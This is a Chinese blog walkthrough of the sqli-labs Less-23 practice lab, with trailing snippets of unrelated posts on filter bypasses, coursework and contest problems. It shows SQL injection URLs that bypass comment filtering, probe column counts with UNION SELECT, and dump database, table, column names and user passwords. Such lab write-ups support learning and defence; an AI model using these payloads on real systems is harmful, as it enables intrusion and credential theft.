sqli-labs less-23 注释符绕过

时间：2024-10-13 22:49:19浏览次数：8

标签：less 23 sq Less 192.168 labs 140.130 id

注释符绕过

在这里插入图片描述
来到23关，提示我们用id查询
查询：

http://192.168.140.130/sq/Less-23/?id=1

页面回显正常，构造

http://192.168.140.130/sq/Less-23/?id=1'

报错

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\phpStudy_64\phpstudy_pro\WWW\sq\Less-23\index.php on line 38
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near''1'' LIMIT 0,1' at line 1

得知是单引号闭合，结合经验，为单引号闭合方式
构造

http://192.168.140.130/sq/Less-23/?id=1’ #

页面报错，猜测是#注释符被过滤了，所以绕过#过滤，想到是单引号闭合，所以我们构造

http://192.168.140.130/sq/Less-23/?id=1’ or '1'='1

成功绕过

测试列数

发现order by 和group by 都不能用，所以我们使用

http://192.168.140.130/sq/Less-23/?id=-1’ union select 1 or ‘1’=‘1
http://192.168.140.130/sq/Less-23/?id=-1’ union select 1,2 or ‘1’=‘1
http://192.168.140.130/sq/Less-23/?id=-1’ union select 1,2,3 or ‘1’=‘1
http://192.168.140.130/sq/Less-23/?id=-1’ union select 1,2,3,4 or ‘1’='1

得知列数和回显位，接下来开始注入

注入

数据库
http://192.168.140.130/sq/Less-23/?id=-1’ union select 1,(select database()),3 or ‘1’='1

表
http://192.168.140.130/sq/Less-23/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 or ‘1’='1

列
http://192.168.140.130/sq/Less-23/?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),3 or ‘1’='1

数据
http://192.168.140.130/sq/Less-23/?id=-1’ union select 1,(select group_concat(username,‘-’,password) from security.users),3 or ‘1’='1

标签：less,23,sq,Less,192.168,labs,140.130,id
From： https://blog.csdn.net/wanggonghanfei/article/details/142834131

sqli-labs less-26 空格绕过
空格绕过过滤空格用Tab代替空格%20%09%0a%0b%0c%0d%a0//()绕过空格注释符绕过//–%20//#–±--;%00;空白字符绕过SQLite3——0A,0D,0c,09,20MYSQL09,0A,0B,0B,0D,A0,20PosgressSQL0A,0D,0C,09,20Oracle_11g00,0A,0D,0C,09,20MSSQL01,02,03,04,05,06,0......
sqli-labs less-25 and/or绕过
来到less-25我们可以看到下面有提示，Hint:YourInputisFilteredwithfollowingresult:说明本关卡有过滤，构造http://192.168.140.130/sq/Less-25/?id=1’页面报错，从报错可以得知闭合方式为',所以用注释符，发现注释符被过滤了http://192.168.140.130/sq/Less-25......
024-2025 20241323第三周总结
这个作业属于https://edu.cnblogs.com/campus/besti/2024-2025-1-CFAP这个作业要求https://www.cnblogs.com/rocedu/p/9577842.html#WEEK03• 门电路• 组合电路，逻辑电路• 冯诺依曼结构• CPU，内存，IO管理• 嵌入式系统，并行结构• 物理安全作业正文https://www.cnblogs.com......
人工智能教育技术学9.23
任务一：去除水印（理论部分）‌‌1.水印的功能：(1)版权保护‌：数字水印可以在图像、声音、视频信号中添加某些数字信息，以证明版权归属，防止未经授权的复制和拷贝。‌‌(2)防伪防盗版‌：通过在多媒体数据中嵌入水印，可以有效防止盗版和伪造，保护原创者的权益。‌‌(3)标识来源：在商业应用......
2024-2025-1 20241423 《计算机基础与程序设计》第3周学习总结
作业信息这个作业属于哪个课程<班级的链接>（如2024-2025-1-计算机基础与程序设计）这个作业要求在哪里2024-2025-1计算机基础与程序设计第三周作业这个作业的目标学习《C语言程序设计》第二章并完成云班课测试。自学《计算机科学概论》第2章，第3章并完成云班课测试......
2024-2025-1学期 20241423 《计算机基础与程序设计》第3周学习总结
学期（如2024-2025-1）学号（如：20241300）《计算机基础与程序设计》第X周学习总结作业信息这个作业属于哪个课程<班级的链接>（如2024-2025-1-计算机基础与程序设计）这个作业要求在哪里<作业要求的链接>(如2024-2025-1计算机基础与程序设计第三周作业)这个作业的目标学习《......
day23打卡
122买股票最大时机IIclassSolution{public:intmaxProfit(vector&prices){vector<vector>dp(prices.size(),vector(2,0));dp[0][0]=-prices[0];dp[0][1]=0;for(inti=1;i<prices.size();++i){dp[i][0]=max(dp[i-1][0],dp[i-1][1]-prices[i......
P9021 [USACO23JAN] Subtree Activation P
P9021[USACO23JAN]SubtreeActivationP这种看上去就很不常规的东西不用想着怎么构造最佳方案，这条路一定是行不通的，考虑转化题意。考虑变化的实质只有两种：全\(0\)状态和\(x\)子树全满的状态转化；\(x\)子树全满和\(y\)子树全满的状态转化，其中\(x,y\)有边。这样的状态转......
P9020 [USACO23JAN] Mana Collection P 题解
P9020[USACO23JAN]ManaCollectionP题解首先考虑对于长为\(d\les\)的最优路径，最优的方法一定是先在起点等\(s-d\)秒再走以确保收集到的最大。\(n\le18\)我们显然考虑状压dp。考虑最大法力值难以计算，正难则反，考虑使未被选择的最小。于是我们设\(dp_{sta,i}\)表示状......
P9466 [EGOI2023] Bikes vs Cars / 骑车与汽车
题意给定\(B,C\)两个矩阵，你需要构造一张两权图\(G=(V,E=\{(u,v,w_1,w_2)\})\)使得从\(i\)到\(j\)之间：可以只经过\(w_1\geB_{i,j}\)的边连通可以只经过\(w_2\geC_{i,j}\)的边连通不能只经过\(w_1>B_{i,j}\)的边连通不能只经过\(w_2>C_{i,j}\)的边连通构......

sqli-labs less-23 注释符绕过

注释符绕过

测试列数

注入

相关文章

赞助商

阅读排行